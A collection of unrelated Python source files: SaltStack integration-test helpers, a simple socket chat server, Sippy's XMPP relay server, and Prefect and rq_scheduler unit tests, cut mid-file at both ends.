' {LIGHT_GREEN}*{ENDC} {0} connected.\n'.format(
target, **self.colors
)
)
sys.stdout.flush()
if not expected_connections:
return
time.sleep(1)
now = datetime.now()
else:
print(
'\n {RED_BOLD}*{ENDC} WARNING: Minions failed to connect '
'back. Tests requiring them WILL fail'.format(**self.colors)
)
print_header('=', sep='=', inline=True)
raise SystemExit()
def sync_minion_modules(self, targets, timeout=120):
# Let's sync all connected minions
print(
' {LIGHT_BLUE}*{ENDC} Syncing minion\'s modules '
'(saltutil.sync_modules)'.format(
', '.join(targets),
**self.colors
)
)
syncing = set(targets)
jid_info = self.client.run_job(
list(targets), 'saltutil.sync_modules',
expr_form='list',
timeout=9999999999999999,
)
if self.wait_for_jid(targets, jid_info['jid'], timeout) is False:
print(
' {RED_BOLD}*{ENDC} WARNING: Minions failed to sync modules. '
'Tests requiring these modules WILL fail'.format(**self.colors)
)
raise SystemExit()
while syncing:
rdata = self.client.get_full_returns(jid_info['jid'], syncing, 1)
if rdata:
for name, output in rdata.iteritems():
if not output['ret']:
# Already synced!?
syncing.remove(name)
continue
print(
' {LIGHT_GREEN}*{ENDC} Synced {0} modules: '
'{1}'.format(
name, ', '.join(output['ret']), **self.colors
)
)
# Synced!
try:
syncing.remove(name)
except KeyError:
print(
' {RED_BOLD}*{ENDC} {0} already synced??? '
'{1}'.format(name, output, **self.colors)
)
return True
class SaltClientTestCaseMixIn(object):
_salt_client_config_file_name_ = 'master'
__slots__ = ('client', '_salt_client_config_file_name_')
@property
def client(self):
return salt.client.LocalClient(
os.path.join(
INTEGRATION_TEST_DIR, 'files', 'conf',
self._salt_client_config_file_name_
)
)
class ModuleCase(TestCase, SaltClientTestCaseMixIn):
'''
Execute a module function
'''
def minion_run(self, _function, *args, **kw):
'''
Run a single salt function on the 'minion' target and condition
the return down to match the behavior of the raw function call
'''
return self.run_function(_function, args, **kw)
def run_function(self, function, arg=(), minion_tgt='minion', timeout=30,
**kwargs):
'''
Run a single salt function and condition the return down to match the
behavior of the raw function call
'''
know_to_return_none = ('file.chown', 'file.chgrp')
orig = self.client.cmd(
minion_tgt, function, arg, timeout=timeout, kwarg=kwargs
)
if minion_tgt not in orig:
self.skipTest(
'WARNING(SHOULD NOT HAPPEN #1935): Failed to get a reply '
'from the minion \'{0}\'. Command output: {1}'.format(
minion_tgt, orig
)
)
elif orig[minion_tgt] is None and function not in know_to_return_none:
self.skipTest(
'WARNING(SHOULD NOT HAPPEN #1935): Failed to get \'{0}\' from '
'the minion \'{1}\'. Command output: {2}'.format(
function, minion_tgt, orig
)
)
return orig[minion_tgt]
def run_state(self, function, **kwargs):
'''
Run the state.single command and return the state return structure
'''
return self.run_function('state.single', [function], **kwargs)
@property
def minion_opts(self):
'''
Return the options used for the minion
'''
return salt.config.minion_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'minion')
)
@property
def sub_minion_opts(self):
'''
Return the options used for the minion
'''
return salt.config.minion_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'sub_minion')
)
@property
def master_opts(self):
'''
Return the options used for the minion
'''
return salt.config.master_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'master')
)
class SyndicCase(TestCase, SaltClientTestCaseMixIn):
'''
Execute a syndic based execution test
'''
_salt_client_config_file_name_ = 'syndic_master'
def run_function(self, function, arg=()):
'''
Run a single salt function and condition the return down to match the
behavior of the raw function call
'''
orig = self.client.cmd('minion', function, arg, timeout=30)
if 'minion' not in orig:
self.skipTest(
'WARNING(SHOULD NOT HAPPEN #1935): Failed to get a reply '
'from the minion. Command output: {0}'.format(orig)
)
return orig['minion']
class ShellCase(TestCase):
'''
Execute a test for a shell command
'''
def run_script(self, script, arg_str, catch_stderr=False, timeout=None):
'''
Execute a script with the given argument string
'''
path = os.path.join(SCRIPT_DIR, script)
if not os.path.isfile(path):
return False
ppath = 'PYTHONPATH={0}:{1}'.format(CODE_DIR, ':'.join(sys.path[1:]))
cmd = '{0} {1} {2} {3}'.format(ppath, PYEXEC, path, arg_str)
popen_kwargs = {
'shell': True,
'stdout': PIPE
}
if catch_stderr is True:
popen_kwargs['stderr'] = PIPE
if not sys.platform.lower().startswith('win'):
popen_kwargs['close_fds'] = True
def detach_from_parent_group():
# detach from parent group (no more inherited signals!)
os.setpgrp()
popen_kwargs['preexec_fn'] = detach_from_parent_group
elif sys.platform.lower().startswith('win') and timeout is not None:
raise RuntimeError('Timeout is not supported under windows')
process = Popen(cmd, **popen_kwargs)
if timeout is not None:
stop_at = datetime.now() + timedelta(seconds=timeout)
term_sent = False
while True:
process.poll()
if process.returncode is not None:
break
if datetime.now() > stop_at:
if term_sent is False:
# Kill the process group since sending the term signal
# would only terminate the shell, not the command
# executed in the shell
os.killpg(os.getpgid(process.pid), signal.SIGINT)
term_sent = True
continue
# As a last resort, kill the process group
os.killpg(os.getpgid(process.pid), signal.SIGKILL)
out = [
'Process took more than {0} seconds to complete. '
'Process Killed!'.format(timeout)
]
if catch_stderr:
return out, [
'Process killed, unable to catch stderr output'
]
return out
if catch_stderr:
if sys.version_info < (2, 7):
# On python 2.6, the subprocess'es communicate() method uses
# select which, is limited by the OS to 1024 file descriptors
# We need more available descriptors to run the tests which
# need the stderr output.
# So instead of .communicate() we wait for the process to
# finish, but, as the python docs state "This will deadlock
# when using stdout=PIPE and/or stderr=PIPE and the child
# process generates enough output to a pipe such that it
# blocks waiting for the OS pipe buffer to accept more data.
# Use communicate() to avoid that." <- a catch, catch situation
#
# Use this work around were it's needed only, python 2.6
process.wait()
out = process.stdout.read()
err = process.stderr.read()
else:
out, err = process.communicate()
# Force closing stderr/stdout to release file descriptors
process.stdout.close()
process.stderr.close()
try:
return out.splitlines(), err.splitlines()
finally:
try:
process.terminate()
except OSError, err:
# process already terminated
pass
data = process.communicate()
process.stdout.close()
try:
return data[0].splitlines()
finally:
try:
process.terminate()
except OSError, err:
# process already terminated
pass
def run_salt(self, arg_str):
'''
Execute salt
'''
mconf = os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf')
arg_str = '-c {0} {1}'.format(mconf, arg_str)
return self.run_script('salt', arg_str)
def run_run(self, arg_str):
'''
Execute salt-run
'''
mconf = os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf')
arg_str = '-c {0} {1}'.format(mconf, arg_str)
return self.run_script('salt-run', arg_str)
def run_run_plus(self, fun, options='', *arg):
'''
Execute Salt run and the salt run function and return the data from
each in a dict
'''
ret = {}
ret['out'] = self.run_run(
'{0} {1} {2}'.format(options, fun, ' '.join(arg))
)
opts = salt.config.master_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'master')
)
opts.update({'doc': False, 'fun': fun, 'arg': arg})
with RedirectStdStreams():
runner = salt.runner.Runner(opts)
ret['fun'] = runner.run()
return ret
def run_key(self, arg_str, catch_stderr=False):
'''
Execute salt-key
'''
mconf = os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf')
arg_str = '-c {0} {1}'.format(mconf, arg_str)
return self.run_script('salt-key', arg_str, catch_stderr=catch_stderr)
def run_cp(self, arg_str):
'''
Execute salt-cp
'''
mconf = os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf')
arg_str = '--config-dir {0} {1}'.format(mconf, arg_str)
return self.run_script('salt-cp', arg_str)
def run_call(self, arg_str):
mconf = os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf')
arg_str = '--config-dir {0} {1}'.format(mconf, arg_str)
return self.run_script('salt-call', arg_str)
class ShellCaseCommonTestsMixIn(object):
def test_version_includes_binary_name(self):
if getattr(self, '_call_binary_', None) is None:
self.skipTest('\'_call_binary_\' not defined.')
out = '\n'.join(self.run_script(self._call_binary_, '--version'))
self.assertIn(self._call_binary_, out)
self.assertIn(salt.__version__, out)
def test_salt_with_git_version(self):
if getattr(self, '_call_binary_', None) is None:
self.skipTest('\'_call_binary_\' not defined.')
from salt.utils import which
from salt.version import __version_info__
git = which('git')
if not git:
self.skipTest('The git binary is not available')
# Let's get the output of git describe
process = subprocess.Popen(
[git, 'describe'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=CODE_DIR
)
out, err = process.communicate()
if not out:
self.skipTest(
'Failed to get the output of \'git describe\'. '
'Error: {0!r}'.format(
err
)
)
parsed_version = '{0}'.format(out.strip().lstrip('v'))
parsed_version_info = tuple([
int(i) for i in parsed_version.split('-', 1)[0].split('.')
])
if parsed_version_info and parsed_version_info < __version_info__:
self.skipTest(
'We\'re likely about to release a new version. '
'This test would fail. Parsed({0!r}) < Expected({1!r})'.format(
parsed_version_info, __version_info__
)
)
elif parsed_version_info != __version_info__:
self.skipTest(
'In order to get the proper salt version with the '
'git hash you need to update salt\'s local git '
'tags. Something like: \'git fetch --tags\' or '
'\'git fetch --tags upstream\' if you followed '
'salt\'s contribute documentation. The version '
'string WILL NOT include the git hash.'
)
out = '\n'.join(self.run_script(self._call_binary_, '--version'))
self.assertIn(parsed_version, out)
class SaltReturnAssertsMixIn(object):
def assertReturnSaltType(self, ret):
try:
self.assertTrue(isinstance(ret, dict))
except AssertionError:
raise AssertionError(
'{0} is not dict. Salt returned: {1}'.format(
type(ret).__name__, ret
)
)
def assertReturnNonEmptySaltType(self, ret):
self.assertReturnSaltType(ret)
try:
self.assertNotEqual(ret, {})
except AssertionError:
raise AssertionError(
'{} is equal to {}. Salt returned an empty dictionary.'
)
def __return_valid_keys(self, keys):
if isinstance(keys, tuple):
# If it's a tuple, turn it into a list
keys = list(keys)
elif isinstance(keys, basestring):
# If it's a basestring , make it a one item list
keys = [keys]
elif not isinstance(keys, list):
# If we've reached here, it's a bad type passed to keys
raise RuntimeError('The passed keys need to be a list')
return keys
def __getWithinSaltReturn(self, ret, keys):
self.assertReturnNonEmptySaltType(ret)
keys = self.__return_valid_keys(keys)
okeys = keys[:]
for part in ret.itervalues():
try:
ret_item = part[okeys.pop(0)]
except (KeyError, TypeError):
raise AssertionError(
'Could not get ret{0} from salt\'s return: {1}'.format(
''.join(['[{0!r}]'.format(k) for k in keys]), part
)
)
while okeys:
try:
ret_item = ret_item[okeys.pop(0)]
except (KeyError, TypeError):
raise AssertionError(
'Could not get ret{0} from salt\'s return: {1}'.format(
''.join(['[{0!r}]'.format(k) for k in keys]), part
)
)
return ret_item
def assertSaltTrueReturn(self, ret):
try:
self.assertTrue(self.__getWithinSaltReturn(ret, 'result'))
except AssertionError:
try:
raise AssertionError(
'{result} is not True. Salt Comment:\n{comment}'.format(
**(ret.values()[0])
)
)
except AttributeError:
raise AssertionError(
'Failed to get result. Salt Returned: {0}'.format(ret)
)
def assertSaltFalseReturn(self, ret):
try:
self.assertFalse(self.__getWithinSaltReturn(ret, 'result'))
except AssertionError:
try:
raise AssertionError(
'{result} is not False. Salt Comment:\n{comment}'.format(
**(ret.values()[0])
)
)
except AttributeError:
raise AssertionError(
'Failed to get result. Salt Returned: {0}'.format(ret)
)
def assertSaltNoneReturn(self, ret):
try:
self.assertIsNone(self.__getWithinSaltReturn(ret, 'result'))
except AssertionError:
try:
raise AssertionError(
'{result} is not None. Salt Comment:\n{comment}'.format(
**(ret.values()[0])
)
)
except AttributeError:
raise AssertionError(
'Failed to get result. Salt Returned: {0}'.format(ret)
)
def assertInSaltComment(self, ret, in_comment):
return self.assertIn(
in_comment, self.__getWithinSaltReturn(ret, 'comment')
)
def assertNotInSaltComment(self, ret, not_in_comment):
return self.assertNotIn(
not_in_comment, self.__getWithinSaltReturn(ret, 'comment')
)
def assertSaltCommentRegexpMatches(self, ret, pattern):
return self.assertInSaltReturnRegexpMatches(ret, pattern, 'comment')
def assertInSaltReturn(self, ret, item_to_check, keys):
return self.assertIn(
item_to_check, self.__getWithinSaltReturn(ret, keys)
)
def assertNotInSaltReturn(self, ret, item_to_check, keys):
return self.assertNotIn(
item_to_check, self.__getWithinSaltReturn(ret, keys)
)
def assertInSaltReturnRegexpMatches(self, ret, pattern, keys=()):
return self.assertRegexpMatches(
self.__getWithinSaltReturn(ret, keys), pattern
)
def assertSaltStateChangesEqual(self, ret, comparison, keys=()):
keys = ['changes'] + self.__return_valid_keys(keys)
return self.assertEqual(
self.__getWithinSaltReturn(ret, keys), comparison
)
def assertSaltStateChangesNotEqual(self, ret, comparison, keys=()):
keys = ['changes'] + self.__return_valid_keys(keys)
return self.assertNotEqual(
self.__getWithinSaltReturn(ret, keys), comparison
)
|
Host.py
|
import socket
import threading , sys
s= socket.socket(socket.AF_INET,socket.SOCK_STREAM,0)
s.bind(('192.168.101.9',5967))
s.listen(5)
name=['sdf','sdf','sdf']
connname=[]
print("HOST SUCCESFULLY \n")
def connect():
while True:
try:
conn, addr = s.accept()
user_name = conn.recv(1024)
user_name = user_name.decode()
print(f"Name :- {user_name} has connected")
conn.send(f"Hello {user_name} you successfully connected to {conn.getsockname()}".encode())
connname.append(conn)
message_for_all_users = f"{user_name} has Joined the chatroom"
sent(conn, message_for_all_users)
t = threading.Thread(target=recv, args=(conn, user_name,))
t.start()
except Exception as e:
print(e)
def sent(conn_name,recv_msg):
for namess in connname:
if conn_name!= namess:
namess.send(recv_msg.encode())
def recv(conn,user_name):
while True:
recv_msg = conn.recv(1024)
if not recv_msg:
sys.exit(0)
recv_msg = recv_msg.decode()
recv_msg=f"{user_name}>> {recv_msg}"
sent(conn, recv_msg)
t=threading.Thread(target=connect)
t.start()
|
XMPP_server.py
|
#!/usr/local/bin/python
#
# Copyright (c) 2003-2005 Maxim Sobolev. All rights reserved.
# Copyright (c) 2006-2014 Sippy Software, Inc. All rights reserved.
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import iksemel
import threading
import base64
import datetime, time
import traceback, sys, os
from select import poll, POLLIN, POLLOUT
from Sippy.Core.EventDispatcher import ED2
MAX_WORKERS = 5
class Worker(iksemel.Stream):
def __init__(self, owner, _id):
self.__owner = owner
self.__id = _id
self.__reconnect = True
self.__reconnect_count = 0
iksemel.Stream.__init__(self)
rx_thr = threading.Thread(target = self.run_rx)
rx_thr.setDaemon(True)
tx_thr = threading.Thread(target = self.run_tx)
tx_thr.setDaemon(True)
rx_thr.start()
tx_thr.start()
def on_xml(self, *args):
pass
def on_stanza(self, doc):
if doc.name() == 'incoming_packet':
data = base64.b64decode(doc.get('msg'))
raddr = (doc.get('src_addr'), int(doc.get('src_port')))
laddr = (doc.get('dst_addr'), int(doc.get('dst_port')))
rtime = float(doc.get('rtime'))
ED2.callFromThread(self.__owner.handle_read, data, raddr, laddr, rtime)
def run_rx(self):
prev_reconnect_count = -1
while True:
if self.__owner._shutdown:
return
if self.__reconnect:
time.sleep(0.1)
continue
try:
# between the check and write to prev_reconnect_count the self.__reconnect_count may change
curr_reconnect_count = self.__reconnect_count
if curr_reconnect_count != prev_reconnect_count:
prev_reconnect_count = curr_reconnect_count
pollobj = poll()
pollobj.register(self.fileno(), POLLIN)
pollret = dict(pollobj.poll())
if pollret.get(self.fileno(), 0) & POLLIN == 0:
continue
self.recv()
except:
print datetime.datetime.now(), 'XMPP_server: unhandled exception when receiving incoming data'
print '-' * 70
traceback.print_exc(file = sys.stdout)
print '-' * 70
sys.stdout.flush()
self.__reconnect = True
self.__owner._wi_available.acquire()
self.__owner._wi_available.notifyAll()
self.__owner._wi_available.release()
time.sleep(0.1)
def run_tx(self):
try:
self.__run_tx()
except:
print datetime.datetime.now(), 'XMPP_server: unhandled exception when processing outgoing data'
print '-' * 70
traceback.print_exc(file = sys.stdout)
print '-' * 70
sys.stdout.flush()
def __run_tx(self):
buf = ''
first_time = True
while True:
if self.__owner._shutdown:
return
if self.__reconnect:
buf = '' # throw away unsent data
if len(buf) == 0:
data, addr = None, None
if not self.__reconnect:
self.__owner._wi_available.acquire()
while len(self.__owner._wi) == 0 and not self.__reconnect:
self.__owner._wi_available.wait()
if self.__owner._shutdown:
os.close(self.fileno())
self.__owner._wi_available.release()
return
if len(self.__owner._wi) > 0:
data, addr, laddress = self.__owner._wi.pop(0)
self.__owner._wi_available.release()
if self.__reconnect:
#print self, self.__reconnect_count
if not first_time:
time.sleep(0.1)
try:
os.close(self.fileno())
except:
pass
try:
self.connect(jid=iksemel.JID('127.0.0.1'), tls=False, port=22223)
first_time = False
os.write(self.fileno(), '<b2bua_slot id="%s"/>' % self.__id)
pollobj = poll()
pollobj.register(self.fileno(), POLLOUT)
except iksemel.StreamError:
continue
except:
traceback.print_exc(file = sys.stdout)
sys.stdout.flush()
continue
self.__reconnect = False
self.__reconnect_count += 1
if data == None:
continue
dst_addr, dst_port = addr
buf = '<outgoing_packet dst_addr="%s" dst_port="%s" ' \
'src_addr="%s" src_port="%s" ' \
'msg="%s"/>' % (dst_addr, dst_port,
laddress[0], laddress[1],
base64.b64encode(data))
if self.__owner._shutdown:
os.close(self.fileno())
return
pollret = dict(pollobj.poll())
if pollret.get(self.fileno(), 0) & POLLOUT == 0:
continue
try:
sent = os.write(self.fileno(), buf)
buf = buf[sent:]
except IOError:
# wait for reconnect
self.__reconnect = True
except OSError:
# wait for reconnect
self.__reconnect = True
class XMPP_server_opts(object):
laddress = None
data_callback = None
def __init__(self, laddress, data_callback):
self.laddress = laddress
self.data_callback = data_callback
def getCopy(self):
return self.__class__(self.laddress, self.data_callback)
class _XMPP_server(object):
_uopts = None
def __init__(self, uopts, real_server):
self._uopts = uopts
self.real_server = real_server
def send_to(self, data, address):
self.real_server._wi_available.acquire()
self.real_server._wi.append((data, address, self._uopts.laddress))
self.real_server._wi_available.notify()
self.real_server._wi_available.release()
def shutdown(self):
self.real_server.shutdown()
self.real_server = None
class XMPP_server(object):
uopts = None
def __init__(self, global_config, uopts):
self.uopts = uopts.getCopy()
self._shutdown = False
self.__data_callback = data_callback
self._wi_available = threading.Condition()
self._wi = []
self.lservers = {}
if type(global_config) == dict:
_id = global_config.get('xmpp_b2bua_id', 5061)
else:
_id = global_config.getdefault('xmpp_b2bua_id', 5061)
for i in range(0, MAX_WORKERS):
Worker(self, _id)
def handle_read(self, data, address, laddress, rtime):
if len(data) > 0 and self.uopts.data_callback != None:
lserver = self.lservers.get(laddress, None)
if lserver == None:
lserver = _XMPP_server(laddress, self)
self.lservers[laddress] = lserver
try:
self.uopts.data_callback(data, address, lserver, rtime)
except:
print datetime.datetime.now(), 'XMPP_server: unhandled exception when receiving incoming data'
print '-' * 70
traceback.print_exc(file = sys.stdout)
print '-' * 70
sys.stdout.flush()
def send_to(self, data, address):
self._wi_available.acquire()
self._wi.append((data, address, self.uopts.laddress))
self._wi_available.notify()
self._wi_available.release()
def shutdown(self):
self._shutdown = True
self._wi_available.acquire()
self._wi_available.notifyAll()
self._wi_available.release()
self.lservers = {}
self.uopts.data_callback = None
|
test_executors.py
|
import os
import multiprocessing
import sys
import threading
import tempfile
import time
import pytest
import prefect
from prefect.utilities.configuration import set_temporary_config
from prefect.utilities.executors import (
timeout_handler,
tail_recursive,
RecursiveCall,
)
def test_timeout_handler_times_out():
slow_fn = lambda: time.sleep(2)
with pytest.raises(TimeoutError):
timeout_handler(slow_fn, timeout=1)
@pytest.mark.skipif(
sys.platform == "win32", reason="Windows doesn't support any timeout logic"
)
def test_timeout_handler_actually_stops_execution():
with tempfile.TemporaryDirectory() as call_dir:
FILE = os.path.join(call_dir, "test.txt")
def slow_fn():
"Runs for 1.5 seconds, writes to file 6 times"
iters = 0
while iters < 6:
time.sleep(0.26)
with open(FILE, "a") as f:
f.write("called\n")
iters += 1
with pytest.raises(TimeoutError):
# allow for at most 3 writes
timeout_handler(slow_fn, timeout=1)
time.sleep(0.5)
with open(FILE, "r") as g:
contents = g.read()
assert len(contents.split("\n")) <= 4
def test_timeout_handler_passes_args_and_kwargs_and_returns():
def do_nothing(x, y=None):
return x, y
assert timeout_handler(do_nothing, 5, timeout=1, y="yellow") == (5, "yellow")
def test_timeout_handler_doesnt_swallow_bad_args():
def do_nothing(x, y=None):
return x, y
with pytest.raises(TypeError):
timeout_handler(do_nothing, timeout=1)
with pytest.raises(TypeError):
timeout_handler(do_nothing, 5, timeout=1, z=10)
with pytest.raises(TypeError):
timeout_handler(do_nothing, 5, timeout=1, y="s", z=10)
def test_timeout_handler_reraises():
def do_something():
raise ValueError("test")
with pytest.raises(ValueError, match="test"):
timeout_handler(do_something, timeout=1)
@pytest.mark.skipif(sys.platform == "win32", reason="Test fails on Windows")
def test_timeout_handler_allows_function_to_spawn_new_process():
def my_process():
p = multiprocessing.Process(target=lambda: 5)
p.start()
p.join()
p.terminate()
assert timeout_handler(my_process, timeout=1) is None
@pytest.mark.skipif(sys.platform == "win32", reason="Test fails on Windows")
def test_timeout_handler_allows_function_to_spawn_new_thread():
def my_thread():
t = threading.Thread(target=lambda: 5)
t.start()
t.join()
assert timeout_handler(my_thread, timeout=1) is None
def test_timeout_handler_doesnt_do_anything_if_no_timeout(monkeypatch):
assert timeout_handler(lambda: 4, timeout=1) == 4
assert timeout_handler(lambda: 4) == 4
def test_timeout_handler_preserves_context():
def my_fun(x, **kwargs):
return prefect.context.get("test_key")
with prefect.context(test_key=42):
res = timeout_handler(my_fun, 2, timeout=1)
assert res == 42
def test_timeout_handler_preserves_logging(caplog):
timeout_handler(prefect.Flow("logs").run, timeout=2)
assert len(caplog.records) >= 2 # 1 INFO to start, 1 INFO to end
def test_recursion_go_case():
@tail_recursive
def my_func(a=0):
if a > 5:
return a
raise RecursiveCall(my_func, a + 2)
assert 6 == my_func()
def test_recursion_beyond_python_limits():
RECURSION_LIMIT = sys.getrecursionlimit()
@tail_recursive
def my_func(calls=0):
if calls > RECURSION_LIMIT + 10:
return calls
raise RecursiveCall(my_func, calls + 1)
assert my_func() == RECURSION_LIMIT + 11
def test_recursion_nested():
def utility_func(a):
if a > 5:
return a
raise RecursiveCall(my_func, a + 2)
@tail_recursive
def my_func(a=0):
return utility_func(a)
assert 6 == my_func()
def test_recursion_multiple():
call_checkpoints = []
@tail_recursive
def a_func(a=0):
call_checkpoints.append(("a", a))
if a > 5:
return a
a = b_func(a + 1)
raise RecursiveCall(a_func, (a + 1) * 2)
@tail_recursive
def b_func(b=0):
call_checkpoints.append(("b", b))
if b > 5:
return b
b = a_func(b + 2)
raise RecursiveCall(b_func, b + 2)
assert a_func() == 42 # :)
assert call_checkpoints == [
("a", 0),
("b", 1),
("a", 3),
("b", 4),
("a", 6),
("b", 8),
("a", 18),
("b", 20),
("a", 42),
]
def test_recursion_raises_when_not_decorated():
call_checkpoints = []
@tail_recursive
def a_func(a=0):
call_checkpoints.append(("a", a))
if a > 5:
return a
a = b_func(a + 1)
raise RecursiveCall(a_func, (a + 1) * 2)
def b_func(b=0):
call_checkpoints.append(("b", b))
if b > 5:
return b
b = a_func(b + 2)
raise RecursiveCall(b_func, b + 2)
with pytest.raises(RecursionError):
assert a_func()
assert call_checkpoints == [("a", 0), ("b", 1), ("a", 3), ("b", 4), ("a", 6)]
|
test_scheduler.py
|
from datetime import datetime, timedelta
import os
import signal
import time
from threading import Thread
from rq import Queue
from rq.compat import as_text
from rq.job import Job
from rq_scheduler import Scheduler
from rq_scheduler.utils import to_unix, from_unix, get_next_scheduled_time, get_utc_timezone
from tests import RQTestCase
def say_hello(name=None):
"""A job with a single argument and a return value."""
if name is None:
name = 'Stranger'
return 'Hi there, %s!' % (name,)
def tl(l):
return [as_text(i) for i in l]
def simple_addition(x, y, z):
return x + y + z
class TestScheduler(RQTestCase):
def setUp(self):
super(TestScheduler, self).setUp()
self.scheduler = Scheduler(connection=self.testconn)
def test_acquire_lock(self):
"""
When scheduler acquires a lock, besides creating a key, it should
also set an expiry that's a few seconds longer than it's polling
interval so it automatically expires if scheduler is unexpectedly
terminated.
"""
key = '%s_lock' % Scheduler.scheduler_key
self.assertNotIn(key, tl(self.testconn.keys('*')))
scheduler = Scheduler(connection=self.testconn, interval=20)
self.assertTrue(scheduler.acquire_lock())
self.assertIn(key, tl(self.testconn.keys('*')))
self.assertEqual(self.testconn.ttl(key), 30)
scheduler.remove_lock()
self.assertNotIn(key, tl(self.testconn.keys('*')))
def test_no_two_schedulers_acquire_lock(self):
"""
Ensure that no two schedulers can acquire the lock at the
same time. When removing the lock, only the scheduler which
originally acquired the lock can remove the lock.
"""
key = '%s_lock' % Scheduler.scheduler_key
self.assertNotIn(key, tl(self.testconn.keys('*')))
scheduler1 = Scheduler(connection=self.testconn, interval=20)
scheduler2 = Scheduler(connection=self.testconn, interval=20)
self.assertTrue(scheduler1.acquire_lock())
self.assertFalse(scheduler2.acquire_lock())
self.assertIn(key, tl(self.testconn.keys('*')))
scheduler2.remove_lock()
self.assertIn(key, tl(self.testconn.keys('*')))
scheduler1.remove_lock()
self.assertNotIn(key, tl(self.testconn.keys('*')))
def test_create_job(self):
"""
Ensure that jobs are created properly.
"""
job = self.scheduler._create_job(say_hello, args=(), kwargs={})
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(job, job_from_queue)
self.assertEqual(job_from_queue.func, say_hello)
def test_create_job_with_ttl(self):
"""
Ensure that TTL is passed to RQ.
"""
job = self.scheduler._create_job(say_hello, ttl=2, args=(), kwargs={})
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(2, job_from_queue.ttl)
def test_create_job_with_id(self):
"""
Ensure that ID is passed to RQ.
"""
job = self.scheduler._create_job(say_hello, id='id test', args=(), kwargs={})
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual('id test', job_from_queue.id)
def test_create_job_with_description(self):
"""
Ensure that description is passed to RQ.
"""
job = self.scheduler._create_job(say_hello, description='description', args=(), kwargs={})
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual('description', job_from_queue.description)
def test_create_job_with_timeout(self):
"""
Ensure that timeout is passed to RQ.
"""
timeout = 13
job = self.scheduler._create_job(say_hello, timeout=13, args=(), kwargs={})
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(timeout, job_from_queue.timeout)
def test_job_not_persisted_if_commit_false(self):
"""
Ensure jobs are only saved to Redis if commit=True.
"""
job = self.scheduler._create_job(say_hello, commit=False)
self.assertEqual(self.testconn.hgetall(job.key), {})
def test_create_scheduled_job(self):
"""
Ensure that scheduled jobs are put in the scheduler queue with the right score
"""
scheduled_time = datetime.utcnow()
job = self.scheduler.enqueue_at(scheduled_time, say_hello)
self.assertEqual(job, Job.fetch(job.id, connection=self.testconn))
self.assertIn(job.id,
tl(self.testconn.zrange(self.scheduler.scheduled_jobs_key, 0, 1)))
self.assertEqual(self.testconn.zscore(self.scheduler.scheduled_jobs_key, job.id),
to_unix(scheduled_time))
def test_create_job_with_meta(self):
"""
Ensure that meta information on the job is passed to rq
"""
expected = {'say': 'hello'}
job = self.scheduler._create_job(say_hello, meta=expected)
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(expected, job_from_queue.meta)
def test_enqueue_at_sets_timeout(self):
"""
Ensure that a job scheduled via enqueue_at can be created with
a custom timeout.
"""
timeout = 13
job = self.scheduler.enqueue_at(datetime.utcnow(), say_hello, timeout=timeout)
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(job_from_queue.timeout, timeout)
def test_enqueue_at_sets_job_id(self):
"""
Ensure that a job scheduled via enqueue_at can be created with
a custom job id.
"""
job_id = 'test_id'
job = self.scheduler.enqueue_at(datetime.utcnow(), say_hello, job_id=job_id)
self.assertEqual(job.id, job_id)
def test_enqueue_at_sets_job_ttl(self):
"""
Ensure that a job scheduled via enqueue_at can be created with a custom job ttl.
"""
job_ttl = 123456789
job = self.scheduler.enqueue_at(datetime.utcnow(), say_hello, job_ttl=job_ttl)
self.assertEqual(job.ttl, job_ttl)
def test_enqueue_at_sets_job_result_ttl(self):
"""
Ensure that a job scheduled via enqueue_at can be created with a custom result ttl.
"""
job_result_ttl = 1234567890
job = self.scheduler.enqueue_at(datetime.utcnow(), say_hello, job_result_ttl=job_result_ttl)
self.assertEqual(job.result_ttl, job_result_ttl)
def test_enqueue_at_sets_meta(self):
"""
Ensure that a job scheduled via enqueue_at can be created with a custom meta.
"""
meta = {'say': 'hello'}
job = self.scheduler.enqueue_at(datetime.utcnow(), say_hello, meta=meta)
self.assertEqual(job.meta, meta)
def test_enqueue_in(self):
"""
Ensure that jobs have the right scheduled time.
"""
right_now = datetime.utcnow()
time_delta = timedelta(minutes=1)
job = self.scheduler.enqueue_in(time_delta, say_hello)
self.assertIn(job.id,
